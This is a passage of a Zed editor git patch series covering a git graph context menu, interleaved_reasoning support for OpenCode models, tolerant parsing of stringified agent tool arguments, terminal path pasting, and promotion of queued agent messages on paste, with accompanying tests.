let focus_handle = self.focus_handle.clone(); let table_focus_handle = @@ -2923,6 +3086,10 @@ impl Render for GitGraph { 
.on_scroll_wheel(cx.listener(Self::handle_graph_scroll)) .on_mouse_move(cx.listener(Self::handle_graph_mouse_move)) .on_click(cx.listener(Self::handle_graph_click)) + .on_mouse_down( + MouseButton::Right, + cx.listener(Self::handle_graph_secondary_mouse_down), + ) .on_hover(cx.listener(|this, &is_hovered: &bool, _, cx| { if !is_hovered && this.hovered_entry_idx.is_some() { this.hovered_entry_idx = None; @@ -2938,11 +3105,14 @@ impl Render for GitGraph { .map_row(move |(index, row), window, cx| { let is_selected = selected_entry_idx == Some(index); let is_hovered = hovered_entry_idx == Some(index); + let is_context_menu_target = + context_menu_entry_idx == Some(index); let table_focus_handle = table_focus_handle.clone(); let is_focused = focus_handle.is_focused(window) || table_focus_handle.is_focused(window); let weak = weak_self.clone(); let weak_for_hover = weak.clone(); + let weak_for_context_menu = weak.clone(); let hover_bg = cx.theme().colors().element_hover.opacity(0.6); let selected_bg = if is_focused { @@ -2953,8 +3123,13 @@ impl Render for GitGraph { row.h(row_height) .cursor_pointer() - .when(is_selected, |row| row.bg(selected_bg)) - .when(is_hovered && !is_selected, |row| row.bg(hover_bg)) + .when(is_selected || is_context_menu_target, |row| { + row.bg(selected_bg) + }) + .when( + is_hovered && !is_selected && !is_context_menu_target, + |row| row.bg(hover_bg), + ) .on_hover(move |&is_hovered, _, cx| { weak_for_hover .update(cx, |this, cx| { @@ -2972,20 +3147,30 @@ impl Render for GitGraph { .ok(); }) .on_click(move |event, window, cx| { - let click_count = event.click_count(); - table_focus_handle.focus(window, cx); weak.update(cx, |this, cx| { - this.select_entry( + this.handle_entry_click( index, + event, ScrollStrategy::Center, + Some(&table_focus_handle), + window, cx, ); - if click_count >= 2 { - this.open_commit_view(index, window, cx); - } }) .ok(); }) + .on_mouse_down( + MouseButton::Right, + move |event: &MouseDownEvent, window, cx| { + 
weak_for_context_menu + .update(cx, |this, cx| { + this.handle_entry_secondary_mouse_down( + index, event, window, cx, + ); + }) + .ok(); + }, + ) .into_any_element() }) .uniform_list( @@ -3057,6 +3242,7 @@ impl Render for GitGraph { .on_action(cx.listener(|this, _: &OpenCommitView, window, cx| { this.open_selected_commit_view(window, cx); })) + .on_action(cx.listener(Self::copy_selected_commit_sha)) .on_action(cx.listener(Self::cancel)) .on_action(cx.listener(|this, _: &FocusSearch, window, cx| { this.search_state @@ -3091,12 +3277,12 @@ impl Render for GitGraph { .child(self.render_search_bar(cx)) .child(div().flex_1().child(content)), ) - .children(self.context_menu.as_ref().map(|(menu, position, _)| { + .children(self.context_menu.as_ref().map(|context_menu| { deferred( anchored() - .position(*position) + .position(context_menu.position) .anchor(Anchor::TopLeft) - .child(menu.clone()), + .child(context_menu.menu.clone()), ) .with_priority(1) })) From ec5e6d92723a48acbf6fc014d4918104d65322f4 Mon Sep 17 00:00:00 2001 From: Vlad Ionescu Date: Tue, 5 May 2026 17:30:17 +0300 Subject: [PATCH 196/231] opencode: Support interleaved_reasoning and fix DeepSeek (#55574) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit OpenCode API endpoints for DeepSeek were [moved from Anthropic-compatible to OpenAI-compatible](https://github.com/anomalyco/opencode/pull/24500) and DeepSeek requires interleaved reasoning enabled to work. I ran a _"rename this variable to potato"_ test and I can confirm DeepSeek V4 Flash and Pro both work now 🎉 Some other OpenCode Go models were marked [on models.dev](https://github.com/anomalyco/models.dev/tree/dev/providers/opencode-go/models) as supporting `interleaved_reasoning` so they too got that enabled. 
Kimi K2.5 and Kimi K2.6 continue to fail with https://github.com/zed-industries/zed/issues/51743 (https://github.com/zed-industries/zed/pull/55085 seems to hint at this being [an OpenCode issue](https://github.com/zed-industries/zed/issues/51743#issuecomment-4336785765)?), but all other models seem to work fine both with `interleaved_reasoning` and without it 🤷 I assume it's better to have that turned on? Again, the intersection of OpenAI Chat Completions API, different models, different inference providers, how they all work together is something I know nothing about! Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Release Notes: - OpenCode Go: use correct DeepSeek endpoints - OpenCode: add support for interleaved_reasoning --- .../language_models/src/provider/opencode.rs | 3 +- crates/opencode/src/opencode.rs | 35 ++++++++++++++----- crates/settings_content/src/language_model.rs | 3 ++ docs/src/ai/llm-providers.md | 2 ++ 4 files changed, 34 insertions(+), 9 deletions(-) diff --git a/crates/language_models/src/provider/opencode.rs b/crates/language_models/src/provider/opencode.rs index 6c0d4a5d3fe1b8..4380d2e1a13c1f 100644 --- a/crates/language_models/src/provider/opencode.rs +++ b/crates/language_models/src/provider/opencode.rs @@ -278,6 +278,7 @@ impl LanguageModelProvider for OpenCodeLanguageModelProvider { protocol, reasoning_effort_levels: model.reasoning_effort_levels.clone(), custom_model_api_url: model.custom_model_api_url.clone(), + interleaved_reasoning: model.interleaved_reasoning, }; let key = format!("{}/{}", subscription.id_prefix(), model.name); models.insert(key, (custom_model, subscription)); @@ -664,7 +665,7 
@@ impl LanguageModel for OpenCodeLanguageModel { false, self.model.max_output_tokens(), reasoning_effort, - false, + self.model.interleaved_reasoning(), ); let stream = self.stream_openai_chat(openai_request, http_client, cx); async move { diff --git a/crates/opencode/src/opencode.rs b/crates/opencode/src/opencode.rs index 5ac344110115f7..9563b77611a3a0 100644 --- a/crates/opencode/src/opencode.rs +++ b/crates/opencode/src/opencode.rs @@ -168,6 +168,7 @@ pub enum Model { protocol: ApiProtocol, reasoning_effort_levels: Option>, custom_model_api_url: Option, + interleaved_reasoning: bool, }, } @@ -385,8 +386,6 @@ impl Model { Self::Gemini3_1Pro | Self::Gemini3Flash => ApiProtocol::Google, - Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => ApiProtocol::Anthropic, - Self::MiniMaxM2_5Free | Self::Glm5 | Self::Glm5_1 @@ -398,6 +397,8 @@ impl Model { | Self::MimoV2_5 | Self::Qwen3_5Plus | Self::Qwen3_6Plus + | Self::DeepSeekV4Pro + | Self::DeepSeekV4Flash | Self::BigPickle | Self::Nemotron3SuperFree | Self::Ling2_6FlashFree @@ -407,6 +408,27 @@ impl Model { } } + pub fn interleaved_reasoning(&self) -> bool { + match self { + Self::DeepSeekV4Pro + | Self::DeepSeekV4Flash + | Self::KimiK2_5 + | Self::KimiK2_6 + | Self::MimoV2Omni + | Self::MimoV2_5 + | Self::MimoV2_5Pro + | Self::Glm5 + | Self::Glm5_1 => true, + + Self::Custom { + interleaved_reasoning, + .. 
+ } => *interleaved_reasoning, + + _ => false, + } + } + pub fn max_token_count(&self) -> u64 { match self { // Anthropic models @@ -487,9 +509,6 @@ impl Model { // Google models Self::Gemini3_1Pro | Self::Gemini3Flash => Some(65_536), - // Anthropic-compatible models - Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => Some(384_000), - // OpenAI-compatible models Self::MiniMaxM2_7 => Some(131_072), Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => Some(131_072), @@ -497,6 +516,7 @@ impl Model { Self::BigPickle => Some(128_000), Self::KimiK2_6 | Self::KimiK2_5 => Some(65_536), Self::Qwen3_5Plus | Self::Qwen3_6Plus => Some(65_536), + Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => Some(384_000), Self::Nemotron3SuperFree => Some(128_000), Self::MimoV2_5Pro | Self::MimoV2_5 | Self::MimoV2Pro | Self::MimoV2Omni => { Some(128_000) @@ -565,14 +585,13 @@ impl Model { | Self::MiniMaxM2_7 | Self::MimoV2Pro | Self::MimoV2_5Pro + | Self::DeepSeekV4Pro + | Self::DeepSeekV4Flash | Self::BigPickle | Self::Nemotron3SuperFree | Self::Ling2_6FlashFree | Self::Hy3PreviewFree => false, - // DeepSeek models (Anthropic protocol) don't support images - Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => false, - Self::Custom { protocol, .. } => matches!( protocol, ApiProtocol::Anthropic diff --git a/crates/settings_content/src/language_model.rs b/crates/settings_content/src/language_model.rs index 0fe922ae0b881e..469be983f0f545 100644 --- a/crates/settings_content/src/language_model.rs +++ b/crates/settings_content/src/language_model.rs @@ -181,6 +181,9 @@ pub struct OpenCodeAvailableModel { pub custom_model_api_url: Option, /// Supported reasoning effort levels, for example `["low", "medium", "high"]. pub reasoning_effort_levels: Option>, + /// When using OpenAiChat protocol, whether thinking tokens are sent as a dedicated `reasoning_content` field or inline in message text. 
+ #[serde(default)] + pub interleaved_reasoning: bool, } #[with_fallible_options] diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index b5dd98afe1a6b6..b32c433803f6cd 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -663,6 +663,7 @@ The Zed agent comes pre-configured with OpenCode models. If you wish to use newe "max_output_tokens": 98765, "protocol": "openai_chat", "reasoning_effort_levels": ["low", "medium", "high"], + "interleaved_reasoning": false, "subscription": "go", "custom_model_api_url": "https://example.com/zen" } @@ -680,6 +681,7 @@ The available configuration options for custom models are: - `max_output_tokens` (optional): maximum tokens the model can generate, for example `64000` - `protocol` (required): model API protocol, one of `"anthropic"`, `"openai_responses"`, `"openai_chat"`, or `"google"` - `reasoning_effort_levels` (optional): list of supported reasoning effort levels, for example `["low", "medium", "high"]`. The latest value in the list is used as the default +- `interleaved_reasoning` (optional, default `false`): if thinking tokens are sent as a dedicated `reasoning_content` field (`true`) or inline in message text (`false`). Applies only when using the `openai_chat` protocol - `subscription` (optional): `"zen"`, `"go"`, or `"free"` (defaults to `"zen"`) - `custom_model_api_url` (optional): custom API base URL to use instead of the default OpenCode API From fbc705599dd31cf0d18896e71f60b2b79fcb2310 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Tue, 5 May 2026 16:40:43 +0200 Subject: [PATCH 197/231] agent: Allow model to provide stringified `timezone` in `now` tool (#55776) See https://github.com/zed-industries/zed/issues/55186#issuecomment-4376114420 I think the recent changes to the tool schema in #55763 will make this more unlikely, but does not hurt to allow the model to provide `"utc"`. 
Release Notes: - N/A --- crates/agent/src/tools.rs | 27 ++++++++++++++++++++++++ crates/agent/src/tools/edit_file_tool.rs | 26 ++--------------------- crates/agent/src/tools/now_tool.rs | 27 ++++++++++++++++++++++++ 3 files changed, 56 insertions(+), 24 deletions(-) diff --git a/crates/agent/src/tools.rs b/crates/agent/src/tools.rs index e629f41e6d5d77..71ee0b2ba1714f 100644 --- a/crates/agent/src/tools.rs +++ b/crates/agent/src/tools.rs @@ -30,6 +30,33 @@ mod web_search_tool; use crate::AgentTool; use language_model::{LanguageModelRequestTool, LanguageModelToolSchemaFormat}; +use serde::{ + Deserialize, Deserializer, + de::{DeserializeOwned, Error as _}, +}; + +/// Deserialize a value that may have been provided as a JSON-encoded string +/// instead of the structured value. Some models occasionally stringify nested +/// arguments, so we accept either form. +pub(crate) fn deserialize_maybe_stringified<'de, T, D>(deserializer: D) -> Result +where + T: DeserializeOwned, + D: Deserializer<'de>, +{ + #[derive(Deserialize)] + #[serde(untagged)] + enum ValueOrJsonString { + Value(T), + String(String), + } + + match ValueOrJsonString::::deserialize(deserializer)? 
{ + ValueOrJsonString::Value(value) => Ok(value), + ValueOrJsonString::String(string) => serde_json::from_str::(&string).map_err(|error| { + D::Error::custom(format!("failed to parse stringified value: {error}")) + }), + } +} pub use apply_code_action_tool::*; pub use context_server_registry::*; diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index 234b4ac92f29d3..69f7be4662abcb 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -2,6 +2,7 @@ mod reindent; mod streaming_fuzzy_matcher; mod streaming_parser; +use super::deserialize_maybe_stringified; use super::restore_file_from_disk_tool::RestoreFileFromDiskTool; use super::save_file_tool::SaveFileTool; use crate::ToolInputPayload; @@ -24,10 +25,7 @@ use language_model::LanguageModelToolResultContent; use project::lsp_store::{FormatTrigger, LspFormatTarget}; use project::{AgentLocation, Project, ProjectPath}; use schemars::JsonSchema; -use serde::{ - Deserialize, Deserializer, Serialize, - de::{DeserializeOwned, Error as _}, -}; +use serde::{Deserialize, Serialize}; use std::ops::Range; use std::path::PathBuf; use std::sync::Arc; @@ -134,26 +132,6 @@ pub struct PartialEdit { pub new_text: Option, } -#[derive(Deserialize)] -#[serde(untagged)] -enum ValueOrJsonString { - Value(T), - String(String), -} - -fn deserialize_maybe_stringified<'de, T, D>(deserializer: D) -> Result -where - T: DeserializeOwned, - D: Deserializer<'de>, -{ - match ValueOrJsonString::::deserialize(deserializer)? 
{ - ValueOrJsonString::Value(value) => Ok(value), - ValueOrJsonString::String(string) => serde_json::from_str::(&string).map_err(|error| { - D::Error::custom(format!("failed to parse stringified value: {error}")) - }), - } -} - #[derive(Debug, Serialize, Deserialize)] #[serde(untagged)] pub enum EditFileToolOutput { diff --git a/crates/agent/src/tools/now_tool.rs b/crates/agent/src/tools/now_tool.rs index 4032731097c8c0..d60e4c7f1d6baf 100644 --- a/crates/agent/src/tools/now_tool.rs +++ b/crates/agent/src/tools/now_tool.rs @@ -6,6 +6,7 @@ use gpui::{App, SharedString, Task}; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; +use super::deserialize_maybe_stringified; use crate::{AgentTool, ToolCallEventStream, ToolInput}; #[derive(Debug, Serialize, Deserialize, JsonSchema)] @@ -23,6 +24,7 @@ pub enum Timezone { #[derive(Debug, Serialize, Deserialize, JsonSchema)] pub struct NowToolInput { /// The timezone to use for the datetime. Use `utc` for UTC, or `local` for the system's local time. 
+ #[serde(deserialize_with = "deserialize_maybe_stringified")] timezone: Timezone, } @@ -62,3 +64,28 @@ impl AgentTool for NowTool { }) } } + +#[cfg(test)] +mod tests { + use super::*; + use gpui::TestAppContext; + use serde_json::json; + + #[gpui::test] + async fn test_stringified_timezone_input_succeeds(cx: &mut TestAppContext) { + let tool = Arc::new(NowTool); + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_full(json!({ + "timezone": "\"utc\"" + })); + + let result = task.await.unwrap(); + assert!( + result.starts_with("The current datetime is "), + "unexpected output: {result}" + ); + } +} From 1a65b2a566e0628ef59bc886eb9bdbe616dd5ab7 Mon Sep 17 00:00:00 2001 From: George Waters Date: Tue, 5 May 2026 10:50:57 -0400 Subject: [PATCH 198/231] Support path pasting in terminal (#48222) This adds the functionality to support pasting the file path of an item when the copied item supports it. This mirrors the behavior of `Terminal.app` on macOS. This only implements the functionality on macOS but could be extended to other platforms. I find this convenient when I'm using Finder to navigate around the file system and I want to copy a directory or file path and put it in the terminal. You can copy the item from Finder and paste it into the terminal and it will write out the full path of the item, making it easy to change directories or provide path parameters to commands. 
Release Notes: - Added path pasting functionality in terminal --- assets/keymaps/default-macos.json | 1 + assets/keymaps/default-windows.json | 1 + crates/terminal/src/terminal.rs | 2 ++ crates/terminal_view/src/terminal_view.rs | 25 +++++++++++++++++++---- 4 files changed, 25 insertions(+), 4 deletions(-) diff --git a/assets/keymaps/default-macos.json b/assets/keymaps/default-macos.json index 8e115985db8d92..d73c6d7a8b65de 100644 --- a/assets/keymaps/default-macos.json +++ b/assets/keymaps/default-macos.json @@ -1264,6 +1264,7 @@ "ctrl-cmd-space": "terminal::ShowCharacterPalette", "cmd-c": "terminal::Copy", "cmd-v": "terminal::Paste", + "ctrl-cmd-v": "terminal::PasteText", "cmd-f": "buffer_search::Deploy", "cmd-a": "editor::SelectAll", "cmd-k": "terminal::Clear", diff --git a/assets/keymaps/default-windows.json b/assets/keymaps/default-windows.json index 9ac7ed46cfd737..fc1d78b39f29c3 100644 --- a/assets/keymaps/default-windows.json +++ b/assets/keymaps/default-windows.json @@ -1221,6 +1221,7 @@ "shift-insert": "terminal::Paste", "ctrl-v": "terminal::Paste", "ctrl-shift-v": "terminal::Paste", + "ctrl-alt-v": "terminal::PasteText", "ctrl-i": "assistant::InlineAssist", "alt-b": ["terminal::SendText", "\u001bb"], "alt-f": ["terminal::SendText", "\u001bf"], diff --git a/crates/terminal/src/terminal.rs b/crates/terminal/src/terminal.rs index 3be023e8262f04..99b3b9d6ce4ad2 100644 --- a/crates/terminal/src/terminal.rs +++ b/crates/terminal/src/terminal.rs @@ -84,6 +84,8 @@ actions!( Copy, /// Pastes from the clipboard. Paste, + /// Pastes the text from the clipboard. + PasteText, /// Shows the character palette for special characters. ShowCharacterPalette, /// Searches for text in the terminal. 
diff --git a/crates/terminal_view/src/terminal_view.rs b/crates/terminal_view/src/terminal_view.rs index 36bac03312356d..a6e28a95f50de4 100644 --- a/crates/terminal_view/src/terminal_view.rs +++ b/crates/terminal_view/src/terminal_view.rs @@ -32,9 +32,9 @@ use std::{ }; use task::TaskId; use terminal::{ - Clear, Copy, Event, HoveredWord, MaybeNavigationTarget, Paste, ScrollLineDown, ScrollLineUp, - ScrollPageDown, ScrollPageUp, ScrollToBottom, ScrollToTop, ShowCharacterPalette, TaskState, - TaskStatus, Terminal, TerminalBounds, ToggleViMode, + Clear, Copy, Event, HoveredWord, MaybeNavigationTarget, Paste, PasteText, ScrollLineDown, + ScrollLineUp, ScrollPageDown, ScrollPageUp, ScrollToBottom, ScrollToTop, ShowCharacterPalette, + TaskState, TaskStatus, Terminal, TerminalBounds, ToggleViMode, alacritty_terminal::{ index::Point as AlacPoint, term::{TermMode, point_to_viewport, search::RegexSearch}, @@ -508,6 +508,7 @@ impl TerminalView { .separator() .action("Copy", Box::new(Copy)) .action("Paste", Box::new(Paste)) + .action("Paste Text", Box::new(PasteText)) .action("Select All", Box::new(SelectAll)) .action("Clear", Box::new(Clear)) .when(assistant_enabled, |menu| { @@ -811,7 +812,7 @@ impl TerminalView { } ///Attempt to paste the clipboard into the terminal - fn paste(&mut self, _: &Paste, _: &mut Window, cx: &mut Context) { + fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { let Some(clipboard) = cx.read_from_clipboard() else { return; }; @@ -820,6 +821,9 @@ impl TerminalView { Some(ClipboardEntry::Image(image)) if !image.bytes.is_empty() => { self.forward_ctrl_v(cx); } + Some(ClipboardEntry::ExternalPaths(paths)) => { + self.add_paths_to_terminal(paths.paths(), window, cx); + } _ => { if let Some(text) = clipboard.text() { self.terminal @@ -829,6 +833,18 @@ impl TerminalView { } } + ///Attempt to paste the clipboard text into the terminal + fn paste_text(&mut self, _: &PasteText, _: &mut Window, cx: &mut Context) { + let Some(clipboard) = 
cx.read_from_clipboard() else { + return; + }; + + if let Some(text) = clipboard.text() { + self.terminal + .update(cx, |terminal, _cx| terminal.paste(&text)); + } + } + /// Emits a raw Ctrl+V so TUI agents can read the OS clipboard directly /// and attach images using their native workflows. fn forward_ctrl_v(&self, cx: &mut Context) { @@ -1226,6 +1242,7 @@ impl Render for TerminalView { .on_action(cx.listener(TerminalView::send_keystroke)) .on_action(cx.listener(TerminalView::copy)) .on_action(cx.listener(TerminalView::paste)) + .on_action(cx.listener(TerminalView::paste_text)) .on_action(cx.listener(TerminalView::clear)) .on_action(cx.listener(TerminalView::scroll_line_up)) .on_action(cx.listener(TerminalView::scroll_line_down)) From 0860f4a097058560be1c63cadebd70589b5aa45f Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Tue, 5 May 2026 12:06:14 -0300 Subject: [PATCH 199/231] Promote queued message to main editor on paste (#55780) Pasting text or an image into a queued-message editor used to be a silent no-op for text and a panic for images. This change makes pasting into a queued message behave like typing into one: the queued message is promoted into the main editor at the cursor position, and the paste is then applied there. 
Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #55521 Release Notes: - Fixed a crash when pasting an image into a queued message --- crates/agent_ui/src/conversation_view.rs | 128 ++++++++++++++++-- .../src/conversation_view/thread_view.rs | 43 +++--- crates/agent_ui/src/message_editor.rs | 86 ++++++++---- crates/editor/src/editor.rs | 39 ++++-- 4 files changed, 220 insertions(+), 76 deletions(-) diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index 6ddac5f3f9fb73..c01d8d8c04ccbd 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -81,7 +81,7 @@ use crate::agent_connection_store::{ }; use crate::agent_diff::AgentDiff; use crate::entry_view_state::{EntryViewEvent, ViewEvent}; -use crate::message_editor::{MessageEditor, MessageEditorEvent}; +use crate::message_editor::{InputAttempt, MessageEditor, MessageEditorEvent}; use crate::profile_selector::{ProfileProvider, ProfileSelector}; use crate::thread_metadata_store::{ThreadId, ThreadMetadataStore}; @@ -1387,7 +1387,7 @@ impl ConversationView { fn move_queued_message_to_main_editor( &mut self, index: usize, - inserted_text: Option<&str>, + attempt: Option, cursor_offset: Option, window: &mut Window, cx: &mut Context, @@ -1396,7 +1396,7 @@ impl ConversationView { active.update(cx, |active, cx| { active.move_queued_message_to_main_editor( index, - inserted_text, + attempt, cursor_offset, window, cx, @@ -2384,15 +2384,17 @@ impl ConversationView { window, move |this, _editor, event, window, cx| match event { MessageEditorEvent::InputAttempted { - text, + attempt, 
cursor_offset, - } => this.move_queued_message_to_main_editor( - index, - Some(text.as_ref()), - Some(*cursor_offset), - window, - cx, - ), + } => { + this.move_queued_message_to_main_editor( + index, + Some(attempt.clone()), + Some(*cursor_offset), + window, + cx, + ); + } MessageEditorEvent::LostFocus => { this.save_queued_message_at_index(index, cx); } @@ -2958,8 +2960,9 @@ pub(crate) mod tests { use agent::{AgentTool, EditFileTool, FetchTool, TerminalTool, ToolPermissionContext}; use agent_servers::FakeAcpAgentServer; use editor::MultiBufferOffset; + use editor::actions::Paste; use fs::FakeFs; - use gpui::{EventEmitter, TestAppContext, VisualTestContext}; + use gpui::{ClipboardItem, EventEmitter, TestAppContext, VisualTestContext}; use parking_lot::Mutex; use project::Project; use serde_json::json; @@ -7405,6 +7408,107 @@ pub(crate) mod tests { ); } + #[gpui::test] + async fn test_paste_text_into_queued_message_promotes_to_main_editor(cx: &mut TestAppContext) { + init_test(cx); + + let (conversation_view, cx) = + paste_into_queued_message(cx, ClipboardItem::new_string("PASTED".to_string())).await; + + let queue_len = active_thread(&conversation_view, cx) + .read_with(cx, |thread, _cx| thread.local_queued_messages.len()); + assert_eq!(queue_len, 0); + + let text = message_editor(&conversation_view, cx).update(cx, |editor, cx| editor.text(cx)); + assert_eq!(text, "queued PASTEDmessage"); + } + + #[gpui::test] + async fn test_paste_image_into_queued_message_promotes_to_main_editor(cx: &mut TestAppContext) { + init_test(cx); + + use base64::Engine as _; + use std::io::Write as _; + let png_bytes = base64::prelude::BASE64_STANDARD + .decode("iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==") + .unwrap(); + let mut image_file = tempfile::Builder::new().suffix(".png").tempfile().unwrap(); + image_file.write_all(&png_bytes).unwrap(); + + let (conversation_view, cx) = paste_into_queued_message( + cx, + ClipboardItem { + 
entries: vec![gpui::ClipboardEntry::ExternalPaths(gpui::ExternalPaths( + vec![image_file.path().to_path_buf()].into(), + ))], + }, + ) + .await; + + let queue_len = active_thread(&conversation_view, cx) + .read_with(cx, |thread, _cx| thread.local_queued_messages.len()); + assert_eq!(queue_len, 0); + + let text = message_editor(&conversation_view, cx).update(cx, |editor, cx| editor.text(cx)); + let image_name = image_file.path().file_name().unwrap().to_string_lossy(); + let expected_uri = acp_thread::MentionUri::PastedImage { + name: image_name.to_string(), + } + .to_uri() + .to_string(); + assert_eq!( + text, + format!("queued [@{image_name}]({expected_uri}) message"), + ); + } + + async fn paste_into_queued_message( + cx: &mut TestAppContext, + clipboard: ClipboardItem, + ) -> (Entity, &mut VisualTestContext) { + let (conversation_view, cx) = + setup_conversation_view(StubAgentServer::default_response(), cx).await; + add_to_workspace(conversation_view.clone(), cx); + + active_thread(&conversation_view, cx).update_in(cx, |thread, _window, cx| { + thread + .session_capabilities + .write() + .set_prompt_capabilities(acp::PromptCapabilities::new().image(true)); + thread.add_to_queue( + vec![acp::ContentBlock::Text(acp::TextContent::new( + "queued message".to_string(), + ))], + vec![], + cx, + ); + }); + conversation_view.update(cx, |_, cx| cx.notify()); + cx.run_until_parked(); + + let queued_editor = active_thread(&conversation_view, cx).read_with(cx, |thread, _cx| { + thread + .queued_message_editors + .first() + .cloned() + .expect("queued message editor not synced") + }); + + cx.write_to_clipboard(clipboard); + + queued_editor.update_in(cx, |message_editor, window, cx| { + message_editor.editor().update(cx, |editor, cx| { + editor.change_selections(SelectionEffects::no_scroll(), window, cx, |selections| { + selections.select_ranges([MultiBufferOffset(7)..MultiBufferOffset(7)]); + }); + }); + message_editor.paste(&Paste, window, cx); + }); + cx.run_until_parked(); 
+ + (conversation_view, cx) + } + #[gpui::test] async fn test_close_all_sessions_skips_when_unsupported(cx: &mut TestAppContext) { init_test(cx); diff --git a/crates/agent_ui/src/conversation_view/thread_view.rs b/crates/agent_ui/src/conversation_view/thread_view.rs index 44b51bb491ed5e..0e0b3d04a8dbc6 100644 --- a/crates/agent_ui/src/conversation_view/thread_view.rs +++ b/crates/agent_ui/src/conversation_view/thread_view.rs @@ -1539,7 +1539,7 @@ impl ThreadView { pub fn move_queued_message_to_main_editor( &mut self, index: usize, - inserted_text: Option<&str>, + attempt: Option, cursor_offset: Option, window: &mut Window, cx: &mut Context, @@ -1549,36 +1549,35 @@ impl ThreadView { }; let queued_content = queued_message.content; let message_editor = self.message_editor.clone(); - let inserted_text = inserted_text.map(ToOwned::to_owned); window.focus(&message_editor.focus_handle(cx), cx); - if message_editor.read(cx).is_empty(cx) { + let adjusted_cursor_offset = if message_editor.read(cx).is_empty(cx) { message_editor.update(cx, |editor, cx| { editor.set_message(queued_content, window, cx); - if let Some(offset) = cursor_offset { - editor.set_cursor_offset(offset, window, cx); - } - if let Some(inserted_text) = inserted_text.as_deref() { - editor.insert_text(inserted_text, window, cx); - } }); - cx.notify(); - return true; - } - - // Adjust cursor offset accounting for existing content - let existing_len = message_editor.read(cx).text(cx).len(); - let separator = "\n\n"; + cursor_offset + } else { + let existing_len = message_editor.read(cx).text(cx).len(); + let separator = "\n\n"; + message_editor.update(cx, |editor, cx| { + editor.append_message(queued_content, Some(separator), window, cx); + }); + cursor_offset.map(|offset| existing_len + separator.len() + offset) + }; message_editor.update(cx, |editor, cx| { - editor.append_message(queued_content, Some(separator), window, cx); - if let Some(offset) = cursor_offset { - let adjusted_offset = existing_len + 
separator.len() + offset; - editor.set_cursor_offset(adjusted_offset, window, cx); + if let Some(offset) = adjusted_cursor_offset { + editor.set_cursor_offset(offset, window, cx); } - if let Some(inserted_text) = inserted_text.as_deref() { - editor.insert_text(inserted_text, window, cx); + match attempt { + Some(InputAttempt::Text(text)) => { + editor.insert_text(&text, window, cx); + } + Some(InputAttempt::Paste(clipboard)) => { + editor.paste_item(&clipboard, window, cx); + } + None => {} } }); diff --git a/crates/agent_ui/src/message_editor.rs b/crates/agent_ui/src/message_editor.rs index 401c282201d84f..d839e87d98ee91 100644 --- a/crates/agent_ui/src/message_editor.rs +++ b/crates/agent_ui/src/message_editor.rs @@ -145,6 +145,12 @@ pub struct MessageEditor { _parse_slash_command_task: Task<()>, } +#[derive(Clone, Debug)] +pub enum InputAttempt { + Text(Arc), + Paste(ClipboardItem), +} + #[derive(Clone, Debug)] pub enum MessageEditorEvent { Send, @@ -153,7 +159,7 @@ pub enum MessageEditorEvent { Focus, LostFocus, InputAttempted { - text: Arc, + attempt: InputAttempt, cursor_offset: usize, }, } @@ -494,7 +500,7 @@ impl MessageEditor { .to_offset(&editor.buffer().read(cx).snapshot(cx)) .0; cx.emit(MessageEditorEvent::InputAttempted { - text: text.clone(), + attempt: InputAttempt::Text(text.clone()), cursor_offset, }); } @@ -954,18 +960,47 @@ impl MessageEditor { cx.emit(MessageEditorEvent::Cancel) } - fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { + pub fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { + let Some(clipboard) = cx.read_from_clipboard() else { + return; + }; + + if self.editor.read(cx).read_only(cx) { + let editor = self.editor.read(cx); + let cursor_offset = editor + .selections + .newest_anchor() + .head() + .to_offset(&editor.buffer().read(cx).snapshot(cx)) + .0; + cx.emit(MessageEditorEvent::InputAttempted { + attempt: InputAttempt::Paste(clipboard), + cursor_offset, + }); + cx.stop_propagation(); + 
